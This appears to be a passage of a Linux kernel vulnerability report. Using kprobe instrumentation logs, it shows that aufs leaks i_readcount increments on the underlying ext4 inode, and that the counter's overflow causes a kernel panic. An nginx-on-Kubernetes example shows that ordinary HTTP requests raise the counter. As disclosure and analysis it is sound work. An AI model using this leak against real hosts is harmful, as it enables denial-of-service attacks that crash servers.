Problem Demonstration / Instrumentation:
---------------------------------------

This kprobe kernel module ("kmod-kprobe-fput.c") inserts a probe on __fput() and prints the i_readcount value before it is decremented, when a specified filename is found. (Usage/steps are in the header comments.)

$ sudo insmod kmod-kprobe-fput.ko
[ 315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0)

The i_readcount value is only incremented on reads, not writes:

$ touch test
[ 308.193058] file: test, fs type: ext4, inode readcount: 0

$ > test
[ 310.293847] file: test, fs type: ext4, inode readcount: 0

$ cat test
[ 312.667149] file: test, fs type: ext4, inode readcount: 1

$ cat test
[ 317.312413] file: test, fs type: ext4, inode readcount: 1

$ cat test
[ 319.223841] file: test, fs type: ext4, inode readcount: 1

It is decremented only when the file is closed:

$ tail -f test &
$ tail -f test &
$ tail -f test &

$ cat test
[ 365.042632] file: test, fs type: ext4, inode readcount: 4

$ kill %%
[ 372.241224] file: test, fs type: ext4, inode readcount: 3

$ kill %%
[ 376.151455] file: test, fs type: ext4, inode readcount: 2

$ kill %%
[ 378.802151] file: test, fs type: ext4, inode readcount: 1

With aufs, there are two files/inodes: one in the virtual (aufs) filesystem and another in the underlying real (ext4) filesystem. aufs handles the open/read/write calls and redirects them to the real file.

$ mkdir dir mnt
$ touch dir/test
$ sudo mount -t aufs -o br=dir none mnt

$ ls mnt
test

The problem is immediately observable: i_readcount for the real (ext4) inode gets an extra increment on the read-only open.

$ cat mnt/test
[ 453.819165] file: test, fs type: aufs, inode readcount: 1
[ 453.819226] file: test, fs type: ext4, inode readcount: 2

$ cat mnt/test
[ 458.091550] file: test, fs type: aufs, inode readcount: 1
[ 458.091599] file: test, fs type: ext4, inode readcount: 3

$ cat mnt/test
[ 463.165711] file: test, fs type: aufs, inode readcount: 1
[ 463.165759] file: test, fs type: ext4, inode readcount: 4

Compare that with the ext4-only (non-aufs) output above for multiple cats ;-) The ext4 inode's i_readcount keeps growing.

...

That kprobe was enabled during the 'Exploit / Local' run. The logs show the i_readcount value incrementing until it overflowed and wrapped back around to 0, at which point the BUG_ON() fired and the kernel panicked.

(With the 'multiple' parameter set, the module only prints when i_readcount, taken as an unsigned value, is a multiple of it.)

$ sudo insmod kmod-kprobe-fput.ko multiple=100000
[ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000)

$ cd mnt && /tmp/exploit
[ 1799.795277] file: test, fs type: ext4, inode readcount: 100000
[ 1800.420418] file: test, fs type: ext4, inode readcount: 200000
[ 1801.030687] file: test, fs type: ext4, inode readcount: 300000
...
[ 2428.610831] file: test, fs type: ext4, inode readcount: 100000000
...
[ 7909.385033] file: test, fs type: ext4, inode readcount: 1000000000
...
[14191.533372] file: test, fs type: ext4, inode readcount: 2000000000
...
[15156.688678] file: test, fs type: ext4, inode readcount: 2147400000
[15157.432852] file: test, fs type: ext4, inode readcount: -2147451616
...
[16123.045186] file: test, fs type: ext4, inode readcount: -2000051616
...
[22655.214420] file: test, fs type: ext4, inode readcount: -1000051616
...
[28517.303066] file: test, fs type: ext4, inode readcount: -100051616
...
[29161.058111] file: test, fs type: ext4, inode readcount: -1051616
[29161.702771] file: test, fs type: ext4, inode readcount: -951616
[29162.337571] file: test, fs type: ext4, inode readcount: -851616
[29162.980385] file: test, fs type: ext4, inode readcount: -751616
[29163.614763] file: test, fs type: ext4, inode readcount: -651616
[29164.253970] file: test, fs type: ext4, inode readcount: -551616
[29164.890793] file: test, fs type: ext4, inode readcount: -451616
[29165.566457] file: test, fs type: ext4, inode readcount: -351616
[29166.224213] file: test, fs type: ext4, inode readcount: -251616
[29166.879175] file: test, fs type: ext4, inode readcount: -151616
[29167.528966] file: test, fs type: ext4, inode readcount: -51616
[29167.862871] file: test, fs type: ext4, inode readcount: 0
[29167.864633] ------------[ cut here ]------------
[29167.866016] kernel BUG at include/linux/fs.h:2963!
[29167.867423] invalid opcode: 0000 [#1] SMP PTI
[29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
[29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[29167.873202] RIP: 0010:__fput+0x25d/0x260
...
[29167.901583] Call Trace:
[29167.902387] ____fput+0xe/0x10
[29167.903344] task_work_run+0x8f/0xb0
[29167.904420] exit_to_usermode_loop+0x131/0x160
[29167.905749] do_syscall_64+0x163/0x190
[29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
...
[29167.967808] Kernel panic - not syncing: Fatal exception

Example of Web Server / nginx with Kubernetes
--

The same i_readcount increments are observed for the 'index.html' page served by nginx, since it is stored in the container image and thus accessed via aufs.

(After deploying Kubernetes/Docker with aufs storage driver)

Start nginx pod/container:

$ kubectl run web-server --image=nginx

Get its IP address:

$ kubectl get pods -o wide
NAME         READY   STATUS    RESTARTS   AGE   IP          NODE             NOMINATED NODE   READINESS GATES
web-server   1/1     Running   0          48s   10.10.0.4   sf244755-focal   <none>           <none>

Test it:

$ curl -s 10.10.0.4 | grep title
<title>Welcome to nginx!</title>

$ sudo insmod kmod-kprobe-fput.ko filename=index.html
[ 3735.601633] kmod_kprobe_fput: kprobe registered (filename: index.html, multiple: 0)

$ curl -s 10.10.0.4 >/dev/null
[ 3757.368671] file: index.html, fs type: aufs, inode readcount: 1
[ 3757.381055] file: index.html, fs type: ext4, inode readcount: 7

$ curl -s 10.10.0.4 >/dev/null
[ 3767.402218] file: index.html, fs type: aufs, inode readcount: 1
[ 3767.407846] file: index.html, fs type: ext4, inode readcount: 8

$ curl -s 10.10.0.4 >/dev/null
[ 3771.856605] file: index.html, fs type: aufs, inode readcount: 1
[ 3771.866484] file: index.html, fs type: ext4, inode readcount: 9

And the web server can be exposed/made available externally, for example:

$ kubectl expose pod web-server --port 80 --type NodePort

$ kubectl get services web-server
NAME         TYPE       CLUSTER-IP    EXTERNAL-IP   PORT(S)        AGE
web-server   NodePort   10.100.0.69   <none>        80:32089/TCP   6s

another-host$ curl -s 192.168.122.151:32089 | grep title
<title>Welcome to nginx!</title>

[ 4037.893050] file: index.html, fs type: aufs, inode readcount: 1
[ 4037.909541] file: index.html, fs type: ext4, inode readcount: 10
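
Note on the wraparound values in the 'Exploit / Local' log: they can be checked arithmetically. The sketch below is a Python model, not the module's code. It assumes that i_readcount behaves as a signed 32-bit counter, and that the 'multiple' filter sign-extends it to an unsigned 64-bit value before taking the remainder. The second assumption is an inference from the logged negative values all ending in ...51616 (2^64 mod 100000 = 51616). All helper names are hypothetical.

```python
import ctypes


def as_int32(n):
    """Wrap an integer to a signed 32-bit value, like a C int counter."""
    return ctypes.c_int32(n).value


def as_uint64(n):
    """Reinterpret a (possibly negative) value as unsigned 64-bit."""
    return ctypes.c_uint64(n).value


def should_print(readcount, multiple):
    """Assumed filter: print when the unsigned value is a multiple of 'multiple'."""
    return multiple == 0 or as_uint64(readcount) % multiple == 0


def next_printed(readcount, multiple):
    """Increment the 32-bit counter until the assumed filter matches again."""
    while True:
        readcount = as_int32(readcount + 1)
        if should_print(readcount, multiple):
            return readcount


if __name__ == "__main__":
    # Last positive value in the log, then the first value after the overflow.
    print(next_printed(2147400000, 100000))
    # Last negative value in the log, then the value at which BUG_ON() fired.
    print(next_printed(-51616, 100000))
```

Under these assumptions the model reproduces the jump from 2147400000 to -2147451616 and the final step from -51616 to 0, which is consistent with the counter needing 2^32 leaked increments to wrap back to zero.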